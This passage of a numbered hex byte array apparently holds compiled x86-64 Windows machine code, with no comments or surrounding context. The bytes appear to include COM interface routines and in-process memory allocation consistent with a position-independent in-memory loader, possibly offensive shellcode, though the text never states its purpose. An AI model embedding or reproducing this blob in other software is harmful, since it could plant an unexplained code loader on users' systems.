1568 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55,
1569 0xa0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1570 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x01, 0x00, 0x00, 0xe8, 0x2d, 0xc3, 0xff,
1571 0xff, 0x48, 0x89, 0x45, 0x50, 0x48, 0x83, 0x7d, 0x50, 0x00, 0x0f, 0x84,
1572 0xe6, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xb0, 0x00, 0x00, 0x00, 0x00, 0x74,
1573 0x6b, 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00,
1574 0x83, 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45,
1575 0x50, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8b, 0x45, 0x40, 0xff, 0xd0, 0x48,
1576 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x00, 0x00,
1577 0x00, 0x00, 0x0f, 0x84, 0x9f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc8,
1578 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1579 0x00, 0x01, 0x00, 0x00, 0xe8, 0xd7, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1580 0x84, 0x7e, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x85,
1581 0xc8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x6b, 0xfe, 0xff, 0xff,
1582 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x83,
1583 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45, 0x50,
1584 0x48, 0x89, 0x45, 0x48, 0x48, 0x8b, 0x45, 0x48, 0xff, 0xd0, 0x48, 0x89,
1585 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x00, 0x00, 0x00,
1586 0x00, 0x0f, 0x84, 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x00,
1587 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
1588 0x01, 0x00, 0x00, 0xe8, 0x6c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1589 0x13, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
1590 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89,
1591 0x10, 0xe9, 0xf9, 0xfd, 0xff, 0xff, 0x90, 0xe9, 0xf3, 0xfd, 0xff, 0xff,
1592 0x90, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
1593 0x89, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
1594 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x85, 0xb9, 0xfd,
1595 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x70, 0x01,
1596 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x80, 0x04, 0x00, 0x00,
1597 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x10,
1598 0x04, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1599 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1600 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04,
1601 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48, 0x83, 0xc0,
1602 0x01, 0x48, 0x01, 0xc0, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x4d, 0xd8,
1603 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xf8, 0x03,
1604 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04,
1605 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49,
1606 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1607 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc8, 0x21, 0x00, 0x00, 0x89,
1608 0x85, 0xf4, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf4, 0x03, 0x00, 0x00, 0x00,
1609 0x0f, 0x88, 0xe4, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00,
1610 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x18, 0x04, 0x00, 0x00,
1611 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48,
1612 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x18, 0x04, 0x00,
1613 0x00, 0x48, 0x81, 0xc1, 0x28, 0x05, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
1614 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff, 0xff, 0xff,
1615 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00,
1616 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x89,
1617 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1618 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x79,
1619 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x02, 0x00, 0x00, 0x48, 0x89,
1620 0x85, 0x80, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1621 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04,
1622 0x00, 0x00, 0xe8, 0x8c, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xf0, 0x01,
1623 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85,
1624 0x70, 0x03, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x28, 0x48, 0x89, 0xc2, 0x48,
1625 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x09, 0x00, 0x00, 0x48,
1626 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x01, 0x00,
1627 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
1628 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1629 0x00, 0x00, 0x0f, 0x85, 0x89, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
1630 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b,
1631 0x95, 0x10, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0xa4, 0x08, 0x00, 0x00,
1632 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x84, 0x08,
1633 0x00, 0x00, 0x48, 0x8d, 0x95, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54,
1634 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba,
1635 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00,
1636 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x30, 0x02, 0x00,
1637 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1638 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x90,
1639 0xe4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48,
1640 0x8d, 0x8d, 0xe0, 0x03, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
1641 0x41, 0xff, 0xd1, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0,
1642 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xb7, 0x01, 0x00, 0x00, 0x48, 0x8b,
1643 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x18,
1644 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1645 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00,
1646 0x00, 0x0f, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1647 0x00, 0x00, 0x48, 0x89, 0x85, 0xb0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
1648 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x18, 0x48,
1649 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x03, 0x00,
1650 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00,
1651 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x2d, 0x01,
1652 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x05, 0xe5,
1653 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0, 0x48, 0x89,
1654 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0xf0, 0xbd, 0xff,
1655 0xff, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
1656 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1657 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1658 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x40, 0x48, 0x8b, 0x85,
1659 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x03, 0x00, 0x00, 0x41,
1660 0xb8, 0x02, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89,
1661 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00,
1662 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03,
1663 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1664 0x00, 0x00, 0x0f, 0x85, 0x97, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1665 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x28, 0x48, 0x8b,
1666 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1667 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
1668 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00,
1669 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7,
1670 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1671 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
1672 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85,
1673 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x75,
1674 0x26, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1675 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0xba, 0x02,
1676 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0,
1677 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b,
1678 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1679 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00,
1680 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1681 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1682 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85,
1683 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85,
1684 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48,
1685 0x83, 0xc0, 0x01, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x01, 0x00,
1686 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1687 0xe8, 0xb3, 0x15, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
1688 0x00, 0x48, 0x8d, 0x4d, 0xd8, 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00,
1689 0x48, 0x8b, 0x95, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20,
1690 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
1691 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x03, 0x1e, 0x00, 0x00,
1692 0x89, 0x85, 0xf4, 0x03, 0x00, 0x00, 0x90, 0x48, 0x81, 0xc4, 0x80, 0x04,
1693 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
1694 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1695 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
1696 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1697 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xb7, 0x01, 0x00, 0x00, 0x48,
1698 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1699 0x15, 0xdf, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b, 0x45,
1700 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4f, 0x03, 0x00, 0x00, 0x48,
1701 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1702 0x15, 0xfc, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x45,
1703 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x62, 0x03, 0x00, 0x00, 0x48,
1704 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1705 0x15, 0x63, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45,
1706 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x68, 0x03, 0x00, 0x00, 0x48,
1707 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1708 0x15, 0x62, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x45,
1709 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x03, 0x00, 0x00, 0x48,
1710 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1711 0x15, 0x53, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b, 0x45,
1712 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8,
1713 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x58, 0x90, 0x48, 0x83, 0xc4,
1714 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48,
1715 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48,
1716 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20, 0x00,
1717 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0xc0, 0x00, 0x00, 0x00,
1718 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88, 0x04,
1719 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1720 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xbb, 0x14, 0x00, 0x00, 0x85, 0xc0, 0x74,
1721 0x25, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88,
1722 0xb4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1723 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x96, 0x14, 0x00, 0x00, 0x85, 0xc0,
1724 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1725 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xb8, 0x00,
1726 0x00, 0x00, 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1727 0x58, 0x48, 0x8d, 0x88, 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
1728 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x56, 0x14,
1729 0x00, 0x00, 0x85, 0xc0, 0x75, 0x26, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d,
1730 0x50, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1731 0xf8, 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc1, 0xe8, 0x86, 0x03, 0x00,
1732 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20,
1733 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80,
1734 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1735 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89,
1736 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89,
1737 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0,
1738 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83,
1739 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1740 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1741 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8,
1742 0x48, 0x8b, 0x55, 0xe8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
1743 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4,
1744 0x8b, 0x45, 0xf4, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1745 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1746 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45,
1747 0x10, 0x48, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85,
1748 0xc0, 0x74, 0x39, 0x48, 0x83, 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03,
1749 0x40, 0x00, 0x80, 0xeb, 0x70, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1750 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8,
1751 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x45,
1752 0xf8, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10,
1753 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83,
1754 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d,
1755 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x40, 0x08,
1756 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x83, 0xc2, 0x28, 0x48, 0x89, 0xd1, 0xff,
1757 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d, 0x50, 0x28, 0x48, 0x8b, 0x45,
1758 0x28, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4,
1759 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48,
1760 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00,
1761 0x00, 0x00, 0xc7, 0x45, 0xa8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4,
1762 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00,
1763 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x19,
1764 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
1765 0x40, 0x18, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
1766 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x75,
1767 0x2a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x20,
1768 0x4c, 0x8d, 0x45, 0xa4, 0x48, 0x8d, 0x4d, 0xa8, 0x48, 0x8d, 0x55, 0xac,
1769 0x48, 0x8b, 0x45, 0x18, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
1770 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0xb8, 0x00, 0x00, 0x00, 0x00,
1771 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1772 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
1773 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b,
1774 0x40, 0x58, 0x48, 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x48, 0x8b, 0x55, 0x18,
1775 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1776 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1777 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1778 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
1779 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1780 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1781 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00,
1782 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1783 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1784 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48,
1785 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x65, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10,
1786 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf1, 0x00,
1787 0x00, 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1788 0x00, 0x48, 0x8d, 0x15, 0x11, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10,
1789 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x38, 0x01,
1790 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1791 0x00, 0x48, 0x8d, 0x15, 0x39, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20,
1792 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48,
1793 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x10, 0x90,
